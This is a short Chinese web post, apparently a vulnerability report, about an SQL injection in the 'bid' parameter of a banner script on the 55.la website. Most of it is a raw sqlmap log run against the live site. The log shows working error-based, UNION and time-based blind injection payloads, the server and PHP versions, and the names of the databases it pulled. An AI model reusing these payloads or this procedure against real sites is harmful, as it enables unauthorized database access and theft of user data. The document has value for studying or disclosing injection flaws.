我拉网主站一处sql注入_MySQL

我拉网主站一处sql注入

注入点

<code>http://www.55.la/run/ding_banner.php?bid=21022</code>

<code>注入地址:http://www.55.la/run/ding_banner.php?bid=21022<br><br>	sqlmap/1.0-dev - automatic SQL injection and database takeover tool<br>	http://www.sqlmap.org<br><br>[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual<br> consent is illegal. It is the end user's responsibility to obey all applicable<br>local, state and federal laws. Authors assume no liability and are not responsib<br>le for any misuse or damage caused by this program<br><br>[*] starting at 02:04:07<br><br>[02:04:07] [INFO] using 'C:/Users/Administrator/Desktop/渗透工具/sqlmap GUI汉化<br>版/rar/output/www.55.la/session' as session file<br>[02:04:07] [INFO] testing connection to the target url<br>[02:04:07] [INFO] testing if the url is stable, wait a few seconds<br>[02:04:08] [INFO] url is stable<br>[02:04:08] [INFO] testing if GET parameter 'bid' is dynamic<br>[02:04:09] [INFO] confirming that GET parameter 'bid' is dynamic<br>[02:04:09] [INFO] GET parameter 'bid' is dynamic<br>[02:04:09] [INFO] heuristic test shows that GET parameter 'bid' might be injecta<br>ble (possible DBMS: MySQL)<br>[02:04:09] [INFO] testing sql injection on GET parameter 'bid'<br>[02:04:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'<br>[02:04:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>'<br>[02:04:11] [INFO] GET parameter 'bid' is 'MySQL >= 5.0 AND error-based - WHERE o<br>r HAVING clause' injectable<br>[02:04:11] [INFO] testing 'MySQL > 5.0.11 stacked queries'<br>[02:04:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'<br>[02:04:21] [INFO] GET parameter 'bid' is 'MySQL > 5.0.11 AND time-based blind' i<br>njectable<br>[02:04:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'<br>[02:04:24] [INFO] target url appears to be UNION injectable with 1 columns<br>[02:04:25] [INFO] GET parameter 'bid' is 'MySQL UNION query (NULL) - 1 to 10 col<br>umns' injectable<br>GET parameter 'bid' is vulnerable. Do you want to keep testing the others (if an<br>y)? [y/N] y<br>sqlmap identified the following injection points with a total of 32 HTTP(s) requ<br>ests:<br>---<br>Place: GET<br>Parameter: bid<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: bid=21022' AND (SELECT 3637 FROM(SELECT COUNT(*),CONCAT(0x3a6f636a3<br>a,(SELECT (CASE WHEN (3637=3637) THEN 1 ELSE 0 END)),0x3a7862753a,FLOOR(RAND(0)*<br>2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uYVe'='uYVe<br><br>	Type: UNION query<br>	Title: MySQL UNION query (NULL) - 1 column<br>	Payload: bid=-1700' UNION SELECT CONCAT(0x3a6f636a3a,0x676e4261505364745265,<br>0x3a7862753a)# AND 'EXgA'='EXgA<br><br>	Type: AND/OR time-based blind<br>	Title: MySQL > 5.0.11 AND time-based blind<br>	Payload: bid=21022' AND SLEEP(5) AND 'xros'='xros<br>---<br><br>[02:04:27] [INFO] the back-end DBMS is MySQL<br><br>web application technology: Nginx, PHP 5.3.24<br>back-end DBMS: MySQL 5.0<br>[02:04:27] [INFO] fetching database names<br>[02:04:30] [INFO] the SQL query used returns 5 entries<br>[02:04:30] [INFO] retrieved: "information_schema"<br>[02:04:37] [INFO] retrieved: "help55la"<br>[02:04:37] [INFO] retrieved: "test"<br>[02:04:37] [INFO] retrieved: "u_run55_la"<br>[02:04:37] [INFO] retrieved: "wstp8_com"<br>available databases [5]:<br>[*] help55la<br>[*] information_schema<br>[*] test<br>[*] u_run55_la<br>[*] wstp8_com<br><br>[02:04:37] [INFO] Fetched data logged to text files under 'C:/Users/Administrato<br>r/Desktop/渗透工具/sqlmap GUI汉化版/rar/output/www.55.la'<br><br>[*] shutting down at 02:04:37</code>